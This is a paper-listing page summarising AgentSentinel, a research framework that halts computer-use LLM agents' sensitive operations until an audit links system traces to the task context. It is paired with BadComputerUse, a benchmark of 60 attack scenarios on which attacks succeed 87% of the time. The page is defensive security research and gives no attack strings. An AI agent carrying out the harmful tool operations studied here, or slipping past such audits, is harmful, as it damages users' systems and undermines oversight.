defense 2025

AgentSentinel: An End-to-End and Real-Time Security Defense Framework for Computer-Use Agents

Haitao Hu , Peng Chen , Yanpeng Zhao , Yuqi Chen

ShanghaiTech University

0 citations

Published on arXiv

2509.07764

Excessive Agency

OWASP LLM Top 10 — LLM08

Prompt Injection

OWASP LLM Top 10 — LLM01

Key Finding

AgentSentinel achieves 79.6% average defense success rate against attacks with an 87% baseline success rate across four state-of-the-art LLMs, significantly outperforming all baseline defenses.

AgentSentinel

Novel technique introduced

Large Language Models (LLMs) have been increasingly integrated into computer-use agents, which can autonomously operate tools on a user's computer to accomplish complex tasks. However, due to the inherently unstable and unpredictable nature of LLM outputs, they may issue unintended tool commands or incorrect inputs, leading to potentially harmful operations. Unlike traditional security risks stemming from insecure user prompts, tool execution results from LLM-driven decisions introduce new and unique security challenges. These vulnerabilities span across all components of a computer-use agent. To mitigate these risks, we propose AgentSentinel, an end-to-end, real-time defense framework designed to mitigate potential security threats on a user's computer. AgentSentinel intercepts all sensitive operations within agent-related services and halts execution until a comprehensive security audit is completed. Our security auditing mechanism introduces a novel inspection process that correlates the current task context with system traces generated during task execution. To thoroughly evaluate AgentSentinel, we present BadComputerUse, a benchmark consisting of 60 diverse attack scenarios across six attack categories. The benchmark demonstrates a 87% average attack success rate on four state-of-the-art LLMs. Our evaluation shows that AgentSentinel achieves an average defense success rate of 79.6%, significantly outperforming all baseline defenses.

Key Contributions

AgentSentinel: an end-to-end, real-time defense framework that intercepts all sensitive agent operations and halts execution pending a security audit correlating task context with system execution traces
Novel inspection mechanism that ties system-level traces back to the originating task context to detect anomalous or harmful agent behavior
BadComputerUse: a benchmark of 60 diverse attack scenarios across 6 attack categories, establishing an 87% average attack success rate baseline on 4 state-of-the-art LLMs

🛡️ Threat Analysis

Details

Domains

nlp

Model Types

llm

Threat Tags

inference_time

Datasets

BadComputerUse

Applications

computer-use agentsllm-based autonomous agents

Read PDF arXiv

AgentSentinel: An End-to-End and Real-Time Security Defense Framework for Computer-Use Agents

Key Contributions

🛡️ Threat Analysis

Details

Similar Papers

BlockA2A: Towards Secure and Verifiable Agent-to-Agent Interoperability

Securing AI Agents: Implementing Role-Based Access Control for Industrial Applications

Spider-Sense: Intrinsic Risk Sensing for Efficient Agent Defense with Hierarchical Adaptive Screening

Policy Compiler for Secure Agentic Systems

Optimizing Agent Planning for Security and Autonomy

The LLMbda Calculus: AI Agents, Conversations, and Information Flow

Agent-Sentry: Bounding LLM Agents via Execution Provenance

A2AS: Agentic AI Runtime Security and Self-Defense